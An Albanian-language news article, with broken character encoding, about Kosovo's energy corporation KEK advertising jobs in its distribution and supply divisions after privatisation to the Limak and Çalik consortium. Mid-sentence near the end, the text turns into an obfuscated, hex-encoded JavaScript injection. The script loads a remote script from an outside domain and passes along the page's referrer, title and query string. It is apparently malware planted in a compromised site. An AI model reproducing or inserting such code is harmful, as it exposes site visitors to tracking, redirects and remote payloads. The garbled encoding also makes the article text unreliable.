f1_kek-punesime-jpg1352106401

KEK-u kA�rkon punA�torA� pas privatizimit tA� Distribucionit

Korporata Energjetike e KosovA�s ka shpallur disa konkurse pA�r punA�simin e punA�torA�ve nA� KompaninA� e Distribucionit dhe nA� Furnizim, gjatA� muajit qA� lamA� pas.

Konkurset e njA�pasnjA�shme KEK-u i kishte shpallur pas nA�nshkrimit tA� kontratA�s nA� mes tA� konsorciumit a�?Limak & A�alika�? dhe QeverisA� sA� KosovA�s pA�r privatizim tA� rrjetit tA� shpA�rndarjes dhe furnizimit me energji elektrike pA�r 26.3 milionA� euro. Shpallja e kA�tyre konkurseve pas nA�nshkrimit tA� kontratA�s, sipas burimeve tA� gazetA�s, e ka shqetA�suar edhe konsorciumin e kompanive turke, qA� kanA� kA�rkuar sqarime.

NA� fillim tA� muajit tetor, KEK-u ka shpallur 90 vende tA� lira tA� punA�s. TA� gjitha nA� divizionet tA� cilat janA� privatizuar nga Qeveria e KosovA�s. Disa nga kA�to vende janA� rishpallur dhe njA� herA� nA� fund tA� muajit tetor. PA�rveA� tyre ka pasur edhe disa konkurse tjera nA�pA�r gjithA� KosovA�n, por nA� numA�r mA� tA� vogA�l.

ZA�dhA�nA�si i KEK-ut, Viktor Buzhala, ka thA�nA� se KEK-u do ta��i angazhojA� kA�ta punonjA�s si rezervA� dhe do tA� mbesin nA� listA�n e pritjes. Ai ka thA�nA� se ata do tA� trajnohen gjatA� kohA�s qA� ata do tA� jenA� nA� rezervA�.

Ministria e Zhvillimit Ekonomak ka paralajmA�ruar se do tA� kA�rkojA� sqarime nga KEK-u pA�r kA�to punA�sime.

Kjo ministri ka sqaruar se a�?Kosovo A�alik Limak Energya�? nuk A�shtA� e obliguar tA� pranojA� mA� shumA� se 2.720 punonjA�s, tA� cilA�t do tA� transferohen nga kompania e Distribucionit dhe Furnizimitvar _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}